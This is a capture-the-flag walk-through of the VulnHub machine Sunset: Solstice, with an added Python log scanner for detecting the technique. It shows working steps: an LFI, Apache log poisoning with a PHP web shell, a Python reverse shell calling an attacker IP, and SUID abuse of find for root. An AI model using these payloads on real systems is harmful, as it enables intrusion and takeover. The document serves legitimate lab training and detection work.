SUNSET: SOLSTICE Walk-Through
Today I will share a write-up of the boot2root VulnHub CTF challenge Sunset: Solstice. whitecr0wz is the author of this machine and its difficulty is intermediate. You can download the machine here: https://www.vulnhub.com/entry/sunset-solstice,499/
1.) Host or Target discovery with NMAP:
“# nmap -sn 192.168.43.1/24”
We got the target IP address, which is 192.168.43.234.
2.) Service and version detection:
“# nmap -sV -p- -vv 192.168.43.234”
Many services are running on this VM. Our next step is to enumerate those services.
3.) WEB Enumeration:
On this VM ports 80, 8593 and 54787 are open, and an HTTP service is running on each of them. After some enumeration I found something interesting on port 8593.
Here I have an entry in my /etc/hosts file mapping sol to 192.168.43.234, so don’t be confused. If we look at the URL “http://192.168.43.235:8593/index.php?book=list”, it may be vulnerable to Local File Inclusion (LFI).
Yes, it is vulnerable to LFI, because we are able to read the /etc/passwd file from the web page.
Now that we have found the vulnerability, we can exploit it. Here we will use an Apache log poisoning attack, because the Apache logs are accessible through this LFI.
To exploit this vulnerability, run the following commands:
“# nc 192.168.43.234 80”
“GET <?php system($_GET['cmd']);?> HTTP/1.1”
Everything is done, so it’s time to call the web page with the following URL:
“http://192.168.43.234:8593/index.php?book=../../../../../var/log/apache2/access.log&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.21",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'”
First we connected to the VM on port 80 to poison the Apache log, writing PHP code into it that reads a ‘cmd’ parameter from the request; then, through the URL above, we passed our reverse shell command in that parameter.
After that we got a low-privileged shell.
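As an added defender-side example (not part of the original write-up), the following Python script scans Apache access-log lines for the two traces this technique leaves behind: directory traversal in the book parameter (including percent-encoded forms) and PHP tags written into the request line by the poisoning request. The log lines are constructed samples, not captures from the machine.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format), not taken from the target VM.
SAMPLE_LOG = """\
192.168.43.21 - - [10/Oct/2020:10:00:01 +0000] "GET /index.php?book=list HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.43.21 - - [10/Oct/2020:10:00:07 +0000] "GET /index.php?book=../../../../../etc/passwd HTTP/1.1" 200 1804 "-" "Mozilla/5.0"
192.168.43.21 - - [10/Oct/2020:10:00:15 +0000] "GET <?php system($_GET['cmd']);?> HTTP/1.1" 400 0 "-" "-"
192.168.43.21 - - [10/Oct/2020:10:00:22 +0000] "GET /index.php?book=..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=id HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# The request line is the first double-quoted field: "METHOD TARGET PROTOCOL".
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')

# Indicators: ../ or ..\ sequences (LFI) and PHP open tags inside the request (log poisoning).
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')
PHP_TAG_RE = re.compile(r'<\?php|<\?=', re.IGNORECASE)


def analyse_line(line):
    """Return a list of finding tags for one access-log line; empty means the line looks clean."""
    m = REQUEST_RE.match(line)
    if not m:
        return ["unparsable"]
    # Decode once so percent-encoded traversal (%2E%2E%2F) is caught as well as the literal form.
    req = unquote(m.group("req"))
    findings = []
    if TRAVERSAL_RE.search(req):
        findings.append("path-traversal")
    if PHP_TAG_RE.search(req):
        findings.append("php-tag-in-request")  # code written into the log for later inclusion
    if "cmd=" in req and "path-traversal" in findings:
        findings.append("lfi-with-cmd-parameter")  # traversal combined with a command parameter
    return findings


def scan(log_text):
    """Map 1-based line numbers to their findings for every suspicious line in the log."""
    report = {}
    for n, line in enumerate(log_text.splitlines(), start=1):
        f = analyse_line(line)
        if f:
            report[n] = f
    return report


if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(f)}")
```

Pointing the script at the real /var/log/apache2/access.log turns the same checks into a quick triage pass; the 400 status on the poisoning request is also a useful pivot in a SIEM query.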
4.) Privilege Escalation:
After spending some time on enumeration, I found a process running as root: a PHP server listening on port 57 and serving the /var/tmp/sv/ directory.
In /var/tmp/sv/ there was an index.php file on which we had write permission, so I changed the content of index.php:
# echo "<?php system('chmod +x /usr/bin/find; chmod +s /usr/bin/find');?>" >index.php
Now that we have changed the content of index.php, it is time to trigger it with the following commands:
# curl localhost:57
# find . -exec /bin/bash -p \; -quit
Yehhh…! Our PHP code executed successfully.
We got the root shell ;)
Reading the flag
Challenge completed.